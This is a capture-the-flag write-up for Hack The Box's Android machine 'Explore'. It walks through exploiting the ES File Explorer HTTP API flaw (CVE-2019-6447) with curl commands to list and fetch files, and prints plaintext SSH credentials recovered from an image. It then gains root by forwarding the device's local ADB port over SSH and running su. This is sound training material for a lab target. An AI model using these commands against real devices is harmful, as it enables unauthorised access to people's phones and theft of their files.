
Hack The Box Writeup - Explore

Enumeration

First, we start by scanning the target machine's open ports. As I've never done a pentest of an Android system, we might have to spend some extra time on enumeration.

rustscan --ulimit 5000 10.129.66.253 -- -sV -sC -oN nmap_scan

PORT      STATE SERVICE REASON  VERSION
2222/tcp  open  ssh     syn-ack (protocol 2.0)
|_    SSH-2.0-SSH Server - Banana Studio
36527/tcp open  unknown syn-ack
42135/tcp open  http    syn-ack ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open  http    syn-ack Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

The open ports are:

  • 2222 - SSH - Banana Studio SSH server
  • 36527 - Unknown Service
  • 42135 - HTTP - ES File Explorer Name Response httpd
  • 59777 - HTTP - Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older

First let’s research what those open HTTP ports are.

Port 42135 - ES File Explorer

Rustscan/Nmap already tells us that this service might be an ES File Explorer instance. As I have basically no knowledge of Android systems, I first have to look up what this actually is:

ES File Explorer is a file manager/explorer designed by ES Global, a subsidiary of DO Global, for Android devices. It includes features like cloud storage integration, file transfer from Android to Windows via FTP or LAN and a root browser. (https://en.wikipedia.org/wiki/ES_File_Explorer ).

ES File Explorer is one of the most used storage managers on Android devices. It works amazingly well with root and the ad-free pro version is in literal sense “Cherry on a Cake”. ES File Explorer may be amazing but as the number of users increased and the Android version progresses, the Android Vulnerability has been openly available. If the target is using an older version of the storage manager, then you can easily hack Android with File Explorer exploit. (https://www.hackeracademy.org/how-to-hack-android-with-es-file-explorer-exploit/)

ES File Explorer is a file manager application on Android, which supports functions such as browsing and managing files. It has over 100 million installations and is the most popular file manager application on Android. ES File Explorer creates an HTTP service bound to port 59777 at runtime, which provides 10+ commands for accessing data on the user's phone and executing applications; however, the service does not check the request, resulting in a security breach. (Knownsec 404 team's analysis of CVE-2019-6447.)

So port 59777 is the HTTP service that ES File Explorer itself opens at runtime, and the "Bukkit JSONAPI" label nmap attached to it is a false fingerprint match: both open HTTP ports belong to the same app.

Port 59777 - ES File Explorer API

While I was doing some research on the used technology, I also ran a directory and file scan on the open port with Feroxbuster:

The results were 1000s of found directories, having similarities to a file system:

However, as I had no previous experience with Android file systems, I didn't know whether my assumptions were correct, so I went back to researching ES File Explorer exploits.

This blog has an awesome explanation of the ES File Explorer Security Vulnerability (CVE-2019-6447). So thanks to Knownsec 404 team.

Let's try some of the available ES File Explorer commands to see whether this machine is actually vulnerable:

└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://10.129.66.253:59777
{"name":"VMware Virtual Platform", "ftpRoot":"/sdcard", "ftpPort":"3721"}

And indeed! We get a response!
We can also try the other available commands:

The article also states that “in addition to the commands listed above, you can also directly access the url + system file path to access the file data”. So that’s why our directory scan found so many valid results!

Initial Foothold

Now that we know what the vulnerability is, we can start exploring the file system.

1) List Apps

└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listApps"}' http://10.129.66.253:59777
[
{"packageName":"com.android.vending", "label":"Google Play Store", "version":"22.4.25-21 [0] [PR] 337959405", "versionCode":"82242510", "location":"/data/app/com.android.vending-0RrcI7JypdrtQo-mFUf4dQ==/base.apk", "size":"21443369", "status":"com.google.android.finsky.setup.VendingBackupAgent", "mTime":"1615841318708"},
{"packageName":"com.google.android.gm", "label":"Gmail", "version":"2020.05.31.316831277.release", "versionCode":"62209002", "location":"/data/app/com.google.android.gm-t9fDaBNpeZ7G-CMdBL_ttg==/base.apk", "size":"27673101", "status":"com.google.android.gm.persistence.GmailBackupAgent", "mTime":"1615678323324"},
{"packageName":"com.estrongs.android.pop", "label":"ES File Explorer", "version":"4.1.9.7.3", "versionCode":"787", "location":"/data/app/com.estrongs.android.pop-MTJxvADQmhb_N0b4rDw3qg==/base.apk", "size":"17130649", "status":"null", "mTime":"1615674548084"},
{"packageName":"com.google.android.gms", "label":"Google Play services", "version":"21.02.14 (100800-352619232)", "versionCode":"210214032", "location":"/data/app/com.google.android.gms-nDaud_4X9rKUVRokD5Czdg==/base.apk", "size":"96281333", "status":"null", "mTime":"1615677711265"},
{"packageName":"net.xnano.android.sshserver", "label":"SSH Server", "version":"0.9.1", "versionCode":"91", "location":"/data/app/net.xnano.android.sshserver-ATSUYngWaQt6kIwvtkUI1A==/base.apk", "size":"6427009", "status":"null", "mTime":"1615674633368"}
]

No obvious foothold here, but two details are worth noting: ES File Explorer is version 4.1.9.7.3, which falls within the range CVE-2019-6447 covers (versions through 4.1.9.7.4), and net.xnano.android.sshserver is Banana Studio's SSH Server app, i.e. the service behind port 2222.

2) List Audios

└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listAudios"}' http://10.129.66.253:59777
[
]

No Audios.

3) List Files

└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://10.129.66.253:59777
[
{"name":"lib", "time":"3/25/20 05:12:02 AM", "type":"folder", "size":"12.00 KB (12,288 Bytes)", },
{"name":"vndservice_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"65.00 Bytes (65 Bytes)", },
{"name":"vendor_service_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", },
{"name":"vendor_seapp_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", },
{"name":"vendor_property_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"392.00 Bytes (392 Bytes)", },
{"name":"vendor_hwservice_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"0.00 Bytes (0 Bytes)", },
{"name":"vendor_file_contexts", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"6.92 KB (7,081 Bytes)", },
{"name":"vendor", "time":"3/25/20 12:12:33 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", },
{"name":"ueventd.rc", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"5.00 KB (5,122 Bytes)", },
{"name":"ueventd.android_x86_64.rc", "time":"8/6/21 04:50:58 AM", "type":"file", "size":"464.00 Bytes (464 Bytes)", },
{"name":"system", "time":"3/25/20 12:12:31 AM", "type":"folder", "size":"4.00 KB (4,096 Bytes)", },
{"name":"sys", "time":"8/6/21 04:50:58 AM", "type":"folder", "size":"0.00 Bytes (0 Bytes)", },
...

This is the root of the Android file system, which explains the thousands of hits from the directory scan; nothing of note at this level. (Note the trailing commas before `}` and `]`: the reply is not strict JSON, so jq will choke on it unless they are stripped first.)

4) List Videos

└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listVideos"}' http://10.129.66.253:59777
[
]

No Videos.

5) List Pics

└──╼ $ curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://10.129.66.253:59777
[
{"name":"concept.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/concept.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"anc.png", "time":"4/21/21 02:37:50 AM", "location":"/storage/emulated/0/DCIM/anc.png", "size":"6.24 KB (6,392 Bytes)", },
{"name":"creds.jpg", "time":"4/21/21 02:38:18 AM", "location":"/storage/emulated/0/DCIM/creds.jpg", "size":"1.14 MB (1,200,401 Bytes)", },
{"name":"224_anc.png", "time":"4/21/21 02:37:21 AM", "location":"/storage/emulated/0/DCIM/224_anc.png", "size":"124.88 KB (127,876 Bytes)", },
]

creds.jpg sounds interesting! Let's check it out. We can fetch it either via the public PoC script's getFile option (which is nothing more than an HTTP GET of the absolute path) or simply in the browser. So we access http://10.129.66.253:59777/storage/emulated/0/DCIM/creds.jpg and see the following picture:

We can probably use those credentials (Kristi:Kr1sT!5h@Rp3xPl0r3!) for the SSH login on port 2222.

└──╼ $ ssh kristi@10.129.66.253 -p 2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

And we are in! Note the context u:r:untrusted_app: the SSH server app runs as an ordinary, unprivileged app user, not as shell or root. The /sdcard directory contains the file user.txt.

Privilege Escalation

First I had to do some thorough research, as I've never done PrivEsc on Android devices. Eventually I found an interesting article describing that Android systems can be debugged over TCP port 5555 via the Android Debug Bridge, and that devices are often shipped from the factory with ADB enabled.
“For the ones not aware of what is ADB, try to think of it as the shell for Android devices, that lets anyone execute commands and install whatsoever they want, thus allowing them to take full control of the device without the need to authenticate. ADB was supposed to only work when connected to a computer via usb port, but as the security researcher Kevin Beaumont discovered the ADB is listening on tcp port 5555, thus anyone from internet can access it and take over your Phone, Tablet, TV or any other Android enabled device.” https://dev.to/exadra37/android-devices-being-shipped-with-tcp-port-5555-enabled-1ig5

Unfortunately, port 5555 is not reachable from the outside (it never showed up in the port scan). Then I found another interesting article on hacktricks.xyz that described a way to reach ADB when it is bound only to the device's loopback interface:

“In case the adb port is only accessible from localhost in the android device but you have access via SSH, you can forward the port 5555 and connect via adb”:

ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222
adb connect 127.0.0.1:5555

So let’s try the same approach on our machine:

$ ssh kristi@10.129.36.12 -p 2222 -L 5555:localhost:5555
$ sudo apt-get install android-tools-adb
$ adb connect localhost:5555
connected to localhost:5555
$ adb shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:su:s0

And we are root! Two things made this work: ADB accepted the connection without any authorization prompt, and the adb shell user (uid 2000, shell) could simply run su, because this Android x86 image has a working su binary, as the resulting SELinux context u:r:su:s0 confirms. On a production device the shell user would have no such path to root. Now the final step is to obtain the root flag.

This post is licensed under CC BY 4.0 by the author.